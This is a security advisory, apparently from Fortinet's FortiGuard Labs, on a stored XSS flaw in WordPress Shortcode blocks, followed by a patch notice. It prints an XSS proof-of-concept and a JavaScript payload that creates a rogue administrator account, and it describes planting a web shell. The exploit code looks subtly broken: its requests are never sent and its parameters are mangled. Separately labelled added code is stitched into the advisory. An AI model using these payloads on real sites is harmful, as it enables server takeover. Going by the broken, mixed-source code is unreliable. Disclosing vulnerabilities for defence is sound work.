Fortinet - WordPress (Core) Stored XSS Vulnerability
FortiGuard Labs Breaking Threat Research
WordPress is the world’s most popular Content Management System (CMS). It holds 60.4% of the global CMS market share, far ahead of second-place Joomla!, which has only 5.2%. As a result, over a third of all websites on the Internet were built with WordPress.
This stored XSS vulnerability affects WordPress versions from 5.0 to 5.2.2.
In WordPress 5.0, users can add Shortcode blocks to a post. When certain HTML-encoded characters such as “&lt;” are added to the Shortcode block and the post is then re-opened, WordPress shows an error message and previews the block content after decoding “&lt;” back to “<”.
Figure 1. Inserting HTML encoded characters into a Shortcode block
Figure 2. A Shortcode error message with preview
The XSS filter in this preview can be easily bypassed with the PoC “"><img src=1 onerror=prompt(1)>”.
Figure 3. Inserting PoC code into the Shortcode block
When any victim views this post, the XSS code will be executed in their browser.
Figure 4. WordPress Shortcode Preview XSS
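To make the preview flaw concrete, here is an added toy model (not WordPress’s own code, and not from the original post) of the two steps described above: the stored block content is entity-decoded, then written into the preview markup; the vulnerable sink is shown beside a hardened one. The function names `decodeEntities`, `escapeHtml`, `vulnerablePreview`, `hardenedPreview` and `containsEventHandler` are illustrative, and the decoder only handles the few entities this example needs.

```javascript
// Added toy model of the Shortcode-block preview bug (illustrative, not WordPress code).

// Undo a handful of HTML entities. Assumption: the real decoder is more
// complete; only the entities needed for this example are handled.
// "&amp;" is decoded last so "&amp;lt;" does not collapse into "<".
function decodeEntities(s) {
  return s.replace(/&lt;/g, "<").replace(/&gt;/g, ">")
          .replace(/&quot;/g, '"').replace(/&#39;/g, "'").replace(/&amp;/g, "&");
}

// Escape a string so the browser renders it as literal text inside HTML.
// "&" must be escaped first so the later replacements are not double-encoded.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Vulnerable pattern: the decoded block content is concatenated straight into
// the preview markup, so a stored "&lt;img ... onerror=...&gt;" becomes a live
// tag in every viewer's browser (the stored XSS described above).
function vulnerablePreview(stored) {
  return '<div class="shortcode-preview">' + decodeEntities(stored) + "</div>";
}

// Hardened pattern: the decoded text is escaped at the point it is written
// into HTML, so the characters are displayed but never parsed as markup.
function hardenedPreview(stored) {
  return '<div class="shortcode-preview">' + escapeHtml(decodeEntities(stored)) + "</div>";
}

// Self-check usable in a unit test: does the rendered preview contain an
// element carrying an on* event-handler attribute?
function containsEventHandler(html) {
  return /<[^>]+\son\w+\s*=/i.test(html);
}

// Constructed input: the post's PoC payload as it would be stored, entity-encoded.
const STORED_POC = "&quot;&gt;&lt;img src=1 onerror=prompt(1)&gt;";
```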
If the victim happens to have admin rights, the attacker could then exploit this vulnerability to take over the administrator’s account, use built-in WordPress functionality to obtain a shell, and then take control of the server.
```javascript
// Send a GET request to the URL '/wordpress/wp-admin/user-new.php', and extract the current 'nonce' value
var ajaxRequest = new XMLHttpRequest();
var requestURL = "/wordpress/wp-admin/user-new.php";
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
var nonce = nonceMatch;
// Construct a POST query, using the previously extracted 'nonce' value, and create a new user with an arbitrary username / password, as an Administrator
var params = "action=createuser&_wpnonce_create-user="+nonce+"&firstname.lastname@example.org&pass1=attacker&pass2=attacker&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
```
Figure 5. Inserting XSS code to add an administrator account
Once a victim with sufficient privileges views this post, the administrator account “attacker” is created.
Figure 6. XSS code is executed
Figure 7. The “attacker” account with administrator permission created by the XSS code
The attacker could then modify an existing PHP file into a webshell and use it to take control of the web server.
Figure 8. Adding a web shell with the attacker’s account
Figure 9. Taking control of the webserver
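For defenders, the account-creation step above leaves a trace in the web server log: the administrator’s browser requests and then POSTs to wp-admin/user-new.php while it is rendering a public post, so the Referer is a front-end URL rather than another wp-admin page. The following added hunting heuristic (illustrative code, not Fortinet’s or WordPress’s) parses Apache/Nginx “combined” format lines and flags such requests; the function names and the sample log lines are constructed for this example.

```javascript
// Added detection heuristic for the admin-account-creation step (illustrative,
// not Fortinet or WordPress code). Assumes the Apache/Nginx "combined" log format
// and that administrators normally reach user-new.php from another wp-admin page.

const COMBINED = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/;

function parseCombined(line) {
  const m = COMBINED.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: m[5], referer: m[6] };
}

// Flag requests to wp-admin/user-new.php whose Referer is missing, unparsable,
// or outside wp-admin. Treat hits as leads to review, not as a block rule:
// an admin typing the URL directly also produces an empty Referer.
function isSuspiciousUserNew(req) {
  if (!req || !/\/wp-admin\/user-new\.php(\?|$)/.test(req.path)) return false;
  if (req.referer === "-" || req.referer === "") return true;
  try {
    return !new URL(req.referer).pathname.includes("/wp-admin/");
  } catch (e) {
    return true; // unparsable Referer: surface it for review
  }
}

function hunt(lines) {
  return lines.map(parseCombined).filter(isSuspiciousUserNew);
}

// Constructed sample log (not real traffic): an admin viewing the poisoned post
// (?p=12), the two requests the injected script makes from that page on their
// behalf, and finally a legitimate visit that arrived from users.php.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Sep/2019:10:00:01 +0000] "GET /wordpress/?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Sep/2019:10:00:02 +0000] "GET /wordpress/wp-admin/user-new.php HTTP/1.1" 200 9000 "http://blog.example/wordpress/?p=12" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Sep/2019:10:00:02 +0000] "POST /wordpress/wp-admin/user-new.php HTTP/1.1" 302 0 "http://blog.example/wordpress/?p=12" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Sep/2019:11:00:00 +0000] "GET /wordpress/wp-admin/user-new.php HTTP/1.1" 200 9000 "http://blog.example/wordpress/wp-admin/users.php" "Mozilla/5.0"',
];
```

Correlating a flagged hit with a subsequent new administrator row in wp_users, or with an edit to a PHP file shortly after, turns the lead into the full chain the post describes.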
FortiGuard Labs contacted WordPress about this zero-day discovery, and they have issued a patch. All users of vulnerable versions of WordPress are encouraged to upgrade to the latest WordPress version or apply the latest patches immediately.
Additionally, organizations that have deployed Fortinet IPS solutions are already protected from this vulnerability with the following signature: